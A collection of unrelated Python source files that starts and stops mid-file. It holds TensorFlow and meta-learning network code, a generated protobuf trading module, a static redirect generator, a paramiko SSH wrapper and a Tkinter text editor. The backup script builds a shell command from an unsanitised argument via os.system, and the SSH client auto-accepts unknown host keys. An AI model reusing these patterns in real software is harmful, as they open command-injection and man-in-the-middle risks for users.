depth = 2 ** (len(self._cnn_kernels) - i - 2) * self._cnn_depth
act, norm = self._act, self._norm
if i == len(self._cnn_kernels) - 1:
depth, act, norm = sum(channels.values()), tf.identity, 'none'
x = self.get(f'conv{i}', ConvT, depth, kernel, 2)(x)
x = self.get(f'convnorm{i}', NormLayer, norm)(x)
x = act(x)
x = x.reshape(features.shape[:-1] + x.shape[1:])
means = tf.split(x, list(channels.values()), -1)
dists = {
key: tfd.Independent(tfd.Normal(mean, 1), 3)
for (key, shape), mean in zip(channels.items(), means)}
return dists
def _mlp(self, features):
shapes = {k: self._shapes[k] for k in self.mlp_keys}
x = features
for i, width in enumerate(self._mlp_layers):
x = self.get(f'dense{i}', tfkl.Dense, width)(x)
x = self.get(f'densenorm{i}', NormLayer, self._norm)(x)
x = self._act(x)
dists = {}
for key, shape in shapes.items():
dists[key] = self.get(f'dense_{key}', DistLayer, shape)(x)
return dists
class MLP(common.Module):
def __init__(self, shape, layers, units, act='elu', norm='none', **out):
self._shape = (shape,) if isinstance(shape, int) else shape
self._layers = layers
self._units = units
self._norm = norm
self._act = get_act(act)
self._out = out
def __call__(self, features):
x = tf.cast(features, prec.global_policy().compute_dtype)
x = x.reshape([-1, x.shape[-1]])
for index in range(self._layers):
x = self.get(f'dense{index}', tfkl.Dense, self._units)(x)
x = self.get(f'norm{index}', NormLayer, self._norm)(x)
x = self._act(x)
x = x.reshape(features.shape[:-1] + [x.shape[-1]])
return self.get('out', DistLayer, self._shape, **self._out)(x)
class GRUCell(tf.keras.layers.AbstractRNNCell):
def __init__(self, size, norm=False, act='tanh', update_bias=-1, **kwargs):
super().__init__()
self._size = size
self._act = get_act(act)
self._norm = norm
self._update_bias = update_bias
self._layer = tfkl.Dense(3 * size, use_bias=norm is not None, **kwargs)
if norm:
self._norm = tfkl.LayerNormalization(dtype=tf.float32)
@property
def state_size(self):
return self._size
@tf.function
def call(self, inputs, state):
state = state[0] # Keras wraps the state in a list.
parts = self._layer(tf.concat([inputs, state], -1))
if self._norm:
dtype = parts.dtype
parts = tf.cast(parts, tf.float32)
parts = self._norm(parts)
parts = tf.cast(parts, dtype)
reset, cand, update = tf.split(parts, 3, -1)
reset = tf.nn.sigmoid(reset)
cand = self._act(reset * cand)
update = tf.nn.sigmoid(update + self._update_bias)
output = update * cand + (1 - update) * state
return output, [output]
class DistLayer(common.Module):
def __init__(
self, shape, dist='mse', min_std=0.1, init_std=0.0):
self._shape = shape
self._dist = dist
self._min_std = min_std
self._init_std = init_std
def __call__(self, inputs):
out = self.get('out', tfkl.Dense, np.prod(self._shape))(inputs)
out = tf.reshape(out, tf.concat([tf.shape(inputs)[:-1], self._shape], 0))
out = tf.cast(out, tf.float32)
if self._dist in ('normal', 'tanh_normal', 'trunc_normal'):
std = self.get('std', tfkl.Dense, np.prod(self._shape))(inputs)
std = tf.reshape(std, tf.concat([tf.shape(inputs)[:-1], self._shape], 0))
std = tf.cast(std, tf.float32)
if self._dist == 'mse':
dist = tfd.Normal(out, 1.0)
return tfd.Independent(dist, len(self._shape))
if self._dist == 'normal':
dist = tfd.Normal(out, std)
return tfd.Independent(dist, len(self._shape))
if self._dist == 'binary':
dist = tfd.Bernoulli(out)
return tfd.Independent(dist, len(self._shape))
if self._dist == 'tanh_normal':
mean = 5 * tf.tanh(out / 5)
std = tf.nn.softplus(std + self._init_std) + self._min_std
dist = tfd.Normal(mean, std)
dist = tfd.TransformedDistribution(dist, common.TanhBijector())
dist = tfd.Independent(dist, len(self._shape))
return common.SampleDist(dist)
if self._dist == 'trunc_normal':
std = 2 * tf.nn.sigmoid((std + self._init_std) / 2) + self._min_std
dist = common.TruncNormalDist(tf.tanh(out), std, -1, 1)
return tfd.Independent(dist, 1)
if self._dist == 'onehot':
return common.OneHotDist(out)
raise NotImplementedError(self._dist)
class NormLayer(common.Module):
def __init__(self, name):
if name == 'none':
self._layer = None
elif name == 'layer':
self._layer = tfkl.LayerNormalization()
else:
raise NotImplementedError(name)
def __call__(self, features):
if not self._layer:
return features
return self._layer(features)
def get_act(name):
if name == 'none':
return tf.identity
if name == 'mish':
return lambda x: x * tf.math.tanh(tf.nn.softplus(x))
elif hasattr(tf.nn, name):
return getattr(tf.nn, name)
elif hasattr(tf, name):
return getattr(tf, name)
else:
raise NotImplementedError(name)
|
py | b414d212276174f5474816e64f97c3b877739fb4 | #!/usr/bin/env python
#!/bin/bash
# -*- coding: utf-8 -*-
import os
import sys
import datetime
base_path = '/mnt/gsuite/rasp_backup/'
backup_file = ''
backup_list_full = ['/bin','/etc','/lib','/media','/opt','/root','/sbin','/sys','/usr','/boot','/dev','/proc','/run','/srv','/tmp','/var','/home/pi']
#backup_list_full = ['/home/pi/project']
backup_file = base_path +datetime.datetime.now().strftime('%y-%m-%d_%H:%M')+ '_'+sys.argv[1] + '.tar.gz'
os.system('tar cvfz ' + backup_file + ' ' + ' '.join(backup_list_full))
|
py | b414d2982e311574e4d4bf3ebf949ff4b2e5c5e1 | from collections import OrderedDict
from functools import reduce
import numpy as np
import tensorflow as tf
from tensorflow.contrib.layers.python import layers
from boml import extension
from boml.setup_model import network_utils
from boml.setup_model.network import BOMLNet
class BOMLNetMetaReprV1(BOMLNet):
def __init__(
self,
_input,
name="BMLNetC4LMetaRepr",
outer_param_dict=OrderedDict(),
model_param_dict=OrderedDict(),
task_parameter=None,
use_T=False,
use_Warp=False,
outer_method="Reverse",
dim_output=-1,
activation=tf.nn.relu,
var_collections=extension.METAPARAMETERS_COLLECTIONS,
conv_initializer=tf.contrib.layers.xavier_initializer_conv2d(tf.float32),
output_weight_initializer=tf.contrib.layers.xavier_initializer(tf.float32),
norm=layers.batch_norm,
data_type=tf.float32,
channels=1,
dim_hidden=[64, 64, 64, 64],
kernel=3,
max_pool=False,
reuse=False,
):
self.dim_output = dim_output
self.kernel = kernel
self.channels = channels
self.dim_hidden = dim_hidden
self.datatype = data_type
self.batch_norm = norm
self.max_pool = max_pool
self.stride = [1, 2, 2, 1]
self.no_stride = [1, 1, 1, 1]
self.activation = activation
self.bias_initializer = tf.zeros_initializer(tf.float32)
self.conv_initializer = conv_initializer
self.output_weight_initializer = output_weight_initializer
self.use_T = use_T
self.use_Warp = use_Warp
self.outer_method = outer_method
self.flatten = False if self.outer_method == "Implicit" else True
super(BOMLNetMetaReprV1, self).__init__(
_input=_input,
outer_param_dict=outer_param_dict,
var_collections=var_collections,
name=name,
model_param_dict=model_param_dict,
task_parameter=task_parameter,
reuse=reuse,
)
self.betas = self.filter_vars("beta")
self.moving_means = self.filter_vars("moving_mean")
self.moving_variances = self.filter_vars("moving_variance")
if not reuse:
extension.remove_from_collection(
extension.GraphKeys.MODEL_VARIABLES, *self.moving_means
)
extension.remove_from_collection(
extension.GraphKeys.MODEL_VARIABLES, *self.moving_variances
)
print(name, "MODEL CREATED")
extension.remove_from_collection(
extension.GraphKeys.METAPARAMETERS, *self.moving_means
)
extension.remove_from_collection(
extension.GraphKeys.METAPARAMETERS, *self.moving_variances
)
def create_outer_parameters(self):
for i in range(len(self.dim_hidden)):
self.outer_param_dict["conv" + str(i)] = network_utils.get_conv_weight(
self, layer=i, initializer=self.conv_initializer
)
self.outer_param_dict["bias" + str(i)] = network_utils.get_bias_weight(
self, layer=i, initializer=self.bias_initializer
)
[
tf.add_to_collections(extension.GraphKeys.METAPARAMETERS, hyper)
for hyper in self.outer_param_dict.values()
]
if len(self.model_param_dict) == 0 and callable(
getattr(self, "create_model_parameters", None)
):
self.create_model_parameters()
return self.outer_param_dict
def create_model_parameters(
self, var_collections=extension.GraphKeys.METAPARAMETERS
):
if self.use_T:
# hyper parameters of transformation layer
for i in range(len(self.dim_hidden)):
self.model_param_dict[
"conv" + str(i) + "_z"
] = network_utils.get_identity(
self.dim_hidden[0], name="conv" + str(i) + "_z", conv=True
)
elif self.use_Warp:
for i in range(len(self.dim_hidden)):
self.model_param_dict[
"conv" + str(i) + "_z"
] = network_utils.get_warp_weight(
self, layer=i, initializer=self.conv_initializer
)
self.model_param_dict[
"bias" + str(i) + "_z"
] = network_utils.get_warp_bias(
self, layer=i, initializer=self.bias_initializer
)
[
tf.add_to_collections(var_collections, model_param)
for model_param in self.model_param_dict.values()
]
return self.model_param_dict
def _forward(self):
"""
for i in range(4):
self.conv_layer(filters=self.dim_hidden[i],stride=self.stride, max_pool=self.max_pool)
flattened_shape = reduce(lambda a, v: a * v, self.layers[-1].get_shape().as_list()[1:])
self + tf.reshape(self.out, shape=(-1, flattened_shape), name='representation')
"""
for i in range(len(self.dim_hidden)):
if self.use_T:
self + network_utils.conv_block_t(
self,
self.outer_param_dict["conv" + str(i)],
self.outer_param_dict["bias" + str(i)],
self.model_param_dict["conv" + str(i) + "_z"],
)
elif self.use_Warp:
self + network_utils.conv_block_warp(
self,
self.outer_param_dict["conv" + str(i)],
self.outer_param_dict["bias" + str(i)],
self.model_param_dict["conv" + str(i) + "_z"],
self.model_param_dict["bias" + str(i) + "_z"],
)
else:
self + network_utils.conv_block(
self,
self.outer_param_dict["conv" + str(i)],
self.outer_param_dict["bias" + str(i)],
)
if self.flatten:
flattened_shape = reduce(
lambda a, v: a * v, self.layers[-1].get_shape().as_list()[1:]
)
self + tf.reshape(
self.out, shape=(-1, flattened_shape), name="representation"
)
else:
if self.max_pool:
self + tf.reshape(
self.out,
[-1, np.prod([int(dim) for dim in self.out.get_shape()[1:]])],
)
else:
self + tf.reduce_mean(self.out, [1, 2])
def re_forward(self, new_input):
return BOMLNetMetaReprV1(
_input=new_input if new_input is not None else self.layers[0],
name=self.name,
activation=self.activation,
outer_param_dict=self.outer_param_dict,
model_param_dict=self.model_param_dict,
dim_output=self.dim_output,
task_parameter=self.task_parameter,
use_Warp=self.use_Warp,
use_T=self.use_T,
var_collections=self.var_collections,
dim_hidden=self.dim_hidden,
output_weight_initializer=self.output_weight_initializer,
max_pool=self.max_pool,
reuse=True,
outer_method=self.outer_method,
)
def BOMLNetOmniglotMetaReprV1(
_input,
outer_param_dict=OrderedDict(),
model_param_dict=OrderedDict(),
batch_norm=layers.batch_norm,
name="BMLNetC4LOmniglot",
use_T=False,
dim_output=-1,
use_Warp=False,
outer_method="Reverse",
**model_args
):
return BOMLNetMetaReprV1(
_input=_input,
name=name,
model_param_dict=model_param_dict,
dim_output=dim_output,
outer_param_dict=outer_param_dict,
norm=batch_norm,
use_T=use_T,
use_Warp=use_Warp,
outer_method=outer_method,
**model_args
)
def BOMLNetMiniMetaReprV1(
_input,
outer_param_dict=OrderedDict(),
model_param_dict=OrderedDict(),
dim_output=-1,
batch_norm=layers.batch_norm,
name="BOMLNetC4LMini",
use_T=False,
use_Warp=False,
outer_method="Reverse",
**model_args
):
return BOMLNetMetaReprV1(
_input=_input,
name=name,
use_T=use_T,
use_Warp=use_Warp,
dim_output=dim_output,
outer_param_dict=outer_param_dict,
model_param_dict=model_param_dict,
norm=batch_norm,
channels=3,
dim_hidden=[32, 32, 32, 32],
max_pool=True,
outer_method=outer_method,
**model_args
)
|
py | b414d48bea07308b90eef5a04b16ef22f112d6d7 | # Generated by the protocol buffer compiler. DO NOT EDIT!
# source: Trd_UpdateOrderFill.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
from google.protobuf import descriptor_pb2
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
import Common_pb2 as Common__pb2
import Trd_Common_pb2 as Trd__Common__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name='Trd_UpdateOrderFill.proto',
package='Trd_UpdateOrderFill',
syntax='proto2',
serialized_pb=_b('\n\x19Trd_UpdateOrderFill.proto\x12\x13Trd_UpdateOrderFill\x1a\x0c\x43ommon.proto\x1a\x10Trd_Common.proto\"V\n\x03S2C\x12%\n\x06header\x18\x01 \x02(\x0b\x32\x15.Trd_Common.TrdHeader\x12(\n\torderFill\x18\x02 \x02(\x0b\x32\x15.Trd_Common.OrderFill\"i\n\x08Response\x12\x15\n\x07retType\x18\x01 \x02(\x05:\x04-400\x12\x0e\n\x06retMsg\x18\x02 \x01(\t\x12\x0f\n\x07\x65rrCode\x18\x03 \x01(\x05\x12%\n\x03s2c\x18\x04 \x01(\x0b\x32\x18.Trd_UpdateOrderFill.S2CBI\n\x13\x63om.futu.openapi.pbZ2github.com/futuopen/ftapi4go/pb/trdupdateorderfill')
,
dependencies=[Common__pb2.DESCRIPTOR,Trd__Common__pb2.DESCRIPTOR,])
_S2C = _descriptor.Descriptor(
name='S2C',
full_name='Trd_UpdateOrderFill.S2C',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='header', full_name='Trd_UpdateOrderFill.S2C.header', index=0,
number=1, type=11, cpp_type=10, label=2,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='orderFill', full_name='Trd_UpdateOrderFill.S2C.orderFill', index=1,
number=2, type=11, cpp_type=10, label=2,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=82,
serialized_end=168,
)
_RESPONSE = _descriptor.Descriptor(
name='Response',
full_name='Trd_UpdateOrderFill.Response',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='retType', full_name='Trd_UpdateOrderFill.Response.retType', index=0,
number=1, type=5, cpp_type=1, label=2,
has_default_value=True, default_value=-400,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='retMsg', full_name='Trd_UpdateOrderFill.Response.retMsg', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='errCode', full_name='Trd_UpdateOrderFill.Response.errCode', index=2,
number=3, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='s2c', full_name='Trd_UpdateOrderFill.Response.s2c', index=3,
number=4, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=170,
serialized_end=275,
)
_S2C.fields_by_name['header'].message_type = Trd__Common__pb2._TRDHEADER
_S2C.fields_by_name['orderFill'].message_type = Trd__Common__pb2._ORDERFILL
_RESPONSE.fields_by_name['s2c'].message_type = _S2C
DESCRIPTOR.message_types_by_name['S2C'] = _S2C
DESCRIPTOR.message_types_by_name['Response'] = _RESPONSE
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
S2C = _reflection.GeneratedProtocolMessageType('S2C', (_message.Message,), dict(
DESCRIPTOR = _S2C,
__module__ = 'Trd_UpdateOrderFill_pb2'
# @@protoc_insertion_point(class_scope:Trd_UpdateOrderFill.S2C)
))
_sym_db.RegisterMessage(S2C)
Response = _reflection.GeneratedProtocolMessageType('Response', (_message.Message,), dict(
DESCRIPTOR = _RESPONSE,
__module__ = 'Trd_UpdateOrderFill_pb2'
# @@protoc_insertion_point(class_scope:Trd_UpdateOrderFill.Response)
))
_sym_db.RegisterMessage(Response)
DESCRIPTOR.has_options = True
DESCRIPTOR._options = _descriptor._ParseOptions(descriptor_pb2.FileOptions(), _b('\n\023com.futu.openapi.pbZ2github.com/futuopen/ftapi4go/pb/trdupdateorderfill'))
# @@protoc_insertion_point(module_scope)
|
py | b414d4cc9fa72d596185f762e840da4fc6c8e11e | #!/usr/bin/env python3
import csv
from pathlib import Path
site="https://www.digital-land.info/"
dataset = Path().cwd().name
print("dataset:", dataset)
def redirect(path, to):
Path(path).parent.mkdir(parents=True, exist_ok=True)
with open(path, 'w') as f:
f.write('<meta http-equiv="refresh" content="0; url=%s%s">' % (site, to))
redirect("./docs/index.html", "dataset/%s" % dataset)
for row in csv.DictReader(open("../entity-builder/dataset/entity.csv")):
if row["dataset"] != dataset:
continue
path = Path("./docs/%s/index.html" % (row["reference"]))
path = Path("./docs/%s/%s/index.html" % (dataset, row["reference"]))
redirect(path, "entity/" + row["entity"])
|
py | b414d4ee5daee3bee3e0ad3fa74608b5783a1cf5 | import paramiko
import time
import socket
class SshClient:
def __init__(self, host, user, password):
self._host = host
self._user = user
self._password = password
self.client = paramiko.SSHClient()
self.client.set_missing_host_key_policy(paramiko.AutoAddPolicy)
# try:
self.client.connect(self._host, username=self._user, password=self._password)
# except paramiko.SshException, exception:
# raise exception
# except paramiko.AuthenticationException, exception:
# message = "SshClient.__init__ failed to authenticate with private key" + exception
# raise paramiko.AuthenticationException(message)
def execute(self, command):
if self.client:
stdin, stdout, stderr = self.client.exec_command(command)
# wait for a command is completed
while not stdout.channel.exit_status_ready():
time.sleep(1)
# get status
execution_status = stdout.channel.recv_exit_status()
if execution_status == 0:
print 'Command:[ {} ] executed successfully'.format(command)
return stdout.read().splitlines()
else:
print 'Error appears during execution. Error code:{}'.format(execution_status)
return stderr.read().splitlines()
else:
raise Exception("Can't execute command cause no SSH Connection")
def close(self):
if self.client:
self.client.close()
|
py | b414d563b5f9a597ab9eea23ec04d4ff4e103e03 | import tkinter as tk
from tkinter import ttk
from tkinter import font, colorchooser, filedialog, messagebox
import os
"""
Creator = vinod kumar
Email = [email protected]
Date = 29/07/2019 10:35
"""
main_application = tk.Tk()
main_application.geometry('1200x800')
main_application.title('Text Editor')
main_application.wm_iconbitmap('icon.ico')
############################################## main menu ###################################################
# -------------------------------------&&&&&&&& End main menu &&&&&&&&&&& ----------------------------------
main_menu = tk.Menu()
#file icons
new_icon = tk.PhotoImage(file='icons2/new.png')
open_icon = tk.PhotoImage(file='icons2/open.png')
save_icon = tk.PhotoImage(file='icons2/save.png')
save_as_icon = tk.PhotoImage(file='icons2/save_as.png')
exit_icon = tk.PhotoImage(file='icons2/exit.png')
file = tk.Menu(main_menu, tearoff=False)
#####edit
#edit icons
copy_icon = tk.PhotoImage(file='icons2/copy.png')
paste_icon = tk.PhotoImage(file='icons2/paste.png')
cut_icon = tk.PhotoImage(file='icons2/cut.png')
clear_all_icon = tk.PhotoImage(file='icons2/clear_all.png')
find_icon = tk.PhotoImage(file='icons2/find.png')
edit = tk.Menu(main_menu, tearoff=False)
######## view icons
tool_bar_icon = tk.PhotoImage(file='icons2/tool_bar.png')
status_bar_icon = tk.PhotoImage(file='icons2/status_bar.png')
view = tk.Menu(main_menu, tearoff=False)
######## color theme
light_default_icon = tk.PhotoImage(file='icons2/light_default.png')
light_plus_icon = tk.PhotoImage(file='icons2/light_plus.png')
dark_icon = tk.PhotoImage(file='icons2/dark.png')
red_icon = tk.PhotoImage(file='icons2/red.png')
monokai_icon = tk.PhotoImage(file='icons2/monokai.png')
night_blue_icon = tk.PhotoImage(file='icons2/night_blue.png')
color_theme = tk.Menu(main_menu, tearoff=False)
theme_choice = tk.StringVar()
color_icons = (light_default_icon, light_plus_icon, dark_icon, red_icon, monokai_icon, night_blue_icon)
color_dict = {
'Light Default ' : ('#000000', '#ffffff'),
'Light Plus' : ('#474747', '#e0e0e0'),
'Dark' : ('#c4c4c4', '#2d2d2d'),
'Red' : ('#2d2d2d', '#ffe8e8'),
'Monokai' : ('#d3b774', '#474747'),
'Night Blue' :('#ededed', '#6b9dc2')
}
# cascade
main_menu.add_cascade(label='File', menu=file)
main_menu.add_cascade(label='Edit', menu=edit)
main_menu.add_cascade(label='View', menu=view)
main_menu.add_cascade(label='Color Theme', menu=color_theme)
############################################## toolbar ###################################################
tool_bar = ttk.Label(main_application)
tool_bar.pack(side=tk.TOP, fill=tk.X)
## font box
font_tuple = tk.font.families()
font_family = tk.StringVar()
font_box = ttk.Combobox(tool_bar, width=30, textvariable=font_family, state='readonly')
font_box['values'] = font_tuple
font_box.current(font_tuple.index('Arial'))
font_box.grid(row=0, column=0, padx=5)
## size box
size_var = tk.IntVar()
font_size = ttk.Combobox(tool_bar, width=14, textvariable = size_var, state='readonly')
font_size['values'] = tuple(range(8,81))
font_size.current(4)
font_size.grid(row=0, column=1, padx=5)
## bold button
bold_icon = tk.PhotoImage(file='icons2/bold.png')
bold_btn = ttk.Button(tool_bar, image=bold_icon)
bold_btn.grid(row=0, column=2, padx=5)
## italic button
italic_icon = tk.PhotoImage(file='icons2/italic.png')
italic_btn = ttk.Button(tool_bar, image=italic_icon)
italic_btn.grid(row=0, column=3, padx=5)
## underline button
underline_icon = tk.PhotoImage(file='icons2/underline.png')
underline_btn = ttk.Button(tool_bar, image = underline_icon)
underline_btn.grid(row = 0, column=4, padx=5)
## font color button
font_color_icon = tk.PhotoImage(file='icons2/font_color.png')
font_color_btn = ttk.Button(tool_bar, image=font_color_icon)
font_color_btn.grid(row=0, column=5,padx=5)
## align left
align_left_icon = tk.PhotoImage(file='icons2/align_left.png')
align_left_btn = ttk.Button(tool_bar, image=align_left_icon)
align_left_btn.grid(row=0, column=6, padx=5)
## align center
align_center_icon = tk.PhotoImage(file='icons2/align_center.png')
align_center_btn = ttk.Button(tool_bar, image=align_center_icon)
align_center_btn.grid(row=0, column=7, padx=5)
## align right
align_right_icon = tk.PhotoImage(file='icons2/align_right.png')
align_right_btn = ttk.Button(tool_bar, image=align_right_icon)
align_right_btn.grid(row=0, column=8, padx=5)
# -------------------------------------&&&&&&&& End toolbar &&&&&&&&&&& ----------------------------------
############################################## text editor ###################################################
text_editor = tk.Text(main_application)
text_editor.config(wrap='word', relief=tk.FLAT)
scroll_bar = tk.Scrollbar(main_application)
text_editor.focus_set()
scroll_bar.pack(side=tk.RIGHT, fill=tk.Y)
text_editor.pack(fill=tk.BOTH, expand=True)
scroll_bar.config(command=text_editor.yview)
text_editor.config(yscrollcommand=scroll_bar.set)
# font family and font size functionality
current_font_family = 'Arial'
current_font_size = 12
def change_font(event=None):
global current_font_family
current_font_family = font_family.get()
text_editor.configure(font=(current_font_family, current_font_size))
def change_fontsize(event=None):
global current_font_size
current_font_size = size_var.get()
text_editor.configure(font=(current_font_family, current_font_size))
font_box.bind("<<ComboboxSelected>>", change_font)
font_size.bind("<<ComboboxSelected>>", change_fontsize)
######## buttons functionality
# bold button functionality
def change_bold():
text_property = tk.font.Font(font=text_editor['font'])
if text_property.actual()['weight'] == 'normal':
text_editor.configure(font=(current_font_family, current_font_size, 'bold'))
if text_property.actual()['weight'] == 'bold':
text_editor.configure(font=(current_font_family, current_font_size, 'normal'))
bold_btn.configure(command=change_bold)
# italic functionlaity
def change_italic():
text_property = tk.font.Font(font=text_editor['font'])
if text_property.actual()['slant'] == 'roman':
text_editor.configure(font=(current_font_family, current_font_size, 'italic'))
if text_property.actual()['slant'] == 'italic':
text_editor.configure(font=(current_font_family, current_font_size, 'normal'))
italic_btn.configure(command=change_italic)
# underline functionality
def change_underline():
text_property = tk.font.Font(font=text_editor['font'])
if text_property.actual()['underline'] == 0:
text_editor.configure(font=(current_font_family, current_font_size, 'underline'))
if text_property.actual()['underline'] == 1:
text_editor.configure(font=(current_font_family, current_font_size, 'normal'))
underline_btn.configure(command=change_underline)
## font color functionality
def change_font_color():
color_var = tk.colorchooser.askcolor()
text_editor.configure(fg=color_var[1])
font_color_btn.configure(command=change_font_color)
### align functionality
def align_left():
text_content = text_editor.get(1.0, 'end')
text_editor.tag_config('left', justify=tk.LEFT)
text_editor.delete(1.0, tk.END)
text_editor.insert(tk.INSERT, text_content, 'left')
align_left_btn.configure(command=align_left)
## center
def align_center():
text_content = text_editor.get(1.0, 'end')
text_editor.tag_config('center', justify=tk.CENTER)
text_editor.delete(1.0, tk.END)
text_editor.insert(tk.INSERT, text_content, 'center')
align_center_btn.configure(command=align_center)
## right
def align_right():
text_content = text_editor.get(1.0, 'end')
text_editor.tag_config('right', justify=tk.RIGHT)
text_editor.delete(1.0, tk.END)
text_editor.insert(tk.INSERT, text_content, 'right')
align_right_btn.configure(command=align_right)
text_editor.configure(font=('Arial', 12))
# -------------------------------------&&&&&&&& End text editor &&&&&&&&&&& ----------------------------------
############################################## status bar ###################################################
status_bar = ttk.Label(main_application, text = 'Status Bar')
status_bar.pack(side=tk.BOTTOM)
text_changed = False
def changed(event=None):
global text_changed
if text_editor.edit_modified():
text_changed = True
words = len(text_editor.get(1.0, 'end-1c').split())
characters = len(text_editor.get(1.0, 'end-1c'))
status_bar.config(text=f'Characters : {characters} Words : {words}')
text_editor.edit_modified(False)
text_editor.bind('<<Modified>>', changed)
# -------------------------------------&&&&&&&& End status bar &&&&&&&&&&& ----------------------------------
############################################## main menu functinality ###################################################
## variable
url = ''
## new functionality
def new_file(event=None):
global url
url = ''
text_editor.delete(1.0, tk.END)
## file commands
file.add_command(label='New', image=new_icon, compound=tk.LEFT, accelerator='Ctrl+N', command=new_file)
## open functionality
def open_file(event=None):
global url
url = filedialog.askopenfilename(initialdir=os.getcwd(), title='Select File', filetypes=(('Text File', '*.txt'), ('All files', '*.*')))
try:
with open(url, 'r') as fr:
text_editor.delete(1.0, tk.END)
text_editor.insert(1.0, fr.read())
except FileNotFoundError:
return
except:
return
main_application.title(os.path.basename(url))
file.add_command(label='Open', image=open_icon, compound=tk.LEFT, accelerator='Ctrl+O', command=open_file)
## save file
def save_file(event=None):
global url
try:
if url:
content = str(text_editor.get(1.0, tk.END))
with open(url, 'w', encoding='utf-8') as fw:
fw.write(content)
else:
url = filedialog.asksaveasfile(mode = 'w', defaultextension='.txt', filetypes=(('Text File', '*.txt'), ('All files', '*.*')))
content2 = text_editor.get(1.0, tk.END)
url.write(content2)
url.close()
except:
return
file.add_command(label='Save', image=save_icon, compound=tk.LEFT, accelerator='Ctrl+S', command = save_file)
## save as functionality
def save_as(event=None):
global url
try:
content = text_editor.get(1.0, tk.END)
url = filedialog.asksaveasfile(mode = 'w', defaultextension='.txt', filetypes=(('Text File', '*.txt'), ('All files', '*.*')))
url.write(content)
url.close()
except:
return
file.add_command(label='Save As', image=new_icon, compound=tk.LEFT, accelerator='Ctrl+Alt+S', command=save_as)
## exit functionality
def exit_func(event=None):
global url, text_changed
try:
if text_changed:
mbox = messagebox.askyesnocancel('Warning', 'Do you want to save the file ?')
if mbox is True:
if url:
content = text_editor.get(1.0, tk.END)
with open(url, 'w', encoding='utf-8') as fw:
fw.write(content)
main_application.destroy()
else:
content2 = str(text_editor.get(1.0, tk.END))
url = filedialog.asksaveasfile(mode = 'w', defaultextension='.txt', filetypes=(('Text File', '*.txt'), ('All files', '*.*')))
url.write(content2)
url.close()
main_application.destroy()
elif mbox is False:
main_application.destroy()
else:
main_application.destroy()
except:
return
file.add_command(label='Exit', image=exit_icon, compound=tk.LEFT, accelerator='Ctrl+Q', command=exit_func)
############ find functionality
def find_func(event=None):
def find():
word = find_input.get()
text_editor.tag_remove('match', '1.0', tk.END)
matches = 0
if word:
start_pos = '1.0'
while True:
start_pos = text_editor.search(word, start_pos, stopindex=tk.END)
if not start_pos:
break
end_pos = f'{start_pos}+{len(word)}c'
text_editor.tag_add('match', start_pos, end_pos)
matches += 1
start_pos = end_pos
text_editor.tag_config('match', foreground='red', background='yellow')
def replace():
word = find_input.get()
replace_text = replace_input.get()
content = text_editor.get(1.0, tk.END)
new_content = content.replace(word, replace_text)
text_editor.delete(1.0, tk.END)
text_editor.insert(1.0, new_content)
find_dialogue = tk.Toplevel()
find_dialogue.geometry('450x250+500+200')
find_dialogue.title('Find')
find_dialogue.resizable(0,0)
## frame
find_frame = ttk.LabelFrame(find_dialogue, text='Find/Replace')
find_frame.pack(pady=20)
## labels
text_find_label = ttk.Label(find_frame, text='Find : ')
text_replace_label = ttk.Label(find_frame, text= 'Replace')
## entry
find_input = ttk.Entry(find_frame, width=30)
replace_input = ttk.Entry(find_frame, width=30)
## button
find_button = ttk.Button(find_frame, text='Find', command=find)
replace_button = ttk.Button(find_frame, text= 'Replace', command=replace)
## label grid
text_find_label.grid(row=0, column=0, padx=4, pady=4)
text_replace_label.grid(row=1, column=0, padx=4, pady=4)
## entry grid
find_input.grid(row=0, column=1, padx=4, pady=4)
replace_input.grid(row=1, column=1, padx=4, pady=4)
## button grid
find_button.grid(row=2, column=0, padx=8, pady=4)
replace_button.grid(row=2, column=1, padx=8, pady=4)
find_dialogue.mainloop()
## edit commands
edit.add_command(label='Copy', image=copy_icon, compound=tk.LEFT, accelerator='Ctrl+C', command=lambda:text_editor.event_generate("<Control c>"))
edit.add_command(label='Paste', image=paste_icon, compound=tk.LEFT, accelerator='Ctrl+V', command=lambda:text_editor.event_generate("<Control v>"))
edit.add_command(label='Cut', image=cut_icon, compound=tk.LEFT, accelerator='Ctrl+X', command=lambda:text_editor.event_generate("<Control x>"))
edit.add_command(label='Clear All', image=clear_all_icon, compound=tk.LEFT, accelerator='Ctrl+Alt+X', command= lambda:text_editor.delete(1.0, tk.END))
edit.add_command(label='Find', image=find_icon, compound=tk.LEFT, accelerator='Ctrl+F', command = find_func)
## view check button
show_statusbar = tk.BooleanVar()
show_statusbar.set(True)
show_toolbar = tk.BooleanVar()
show_toolbar.set(True)
def hide_toolbar():
global show_toolbar
if show_toolbar:
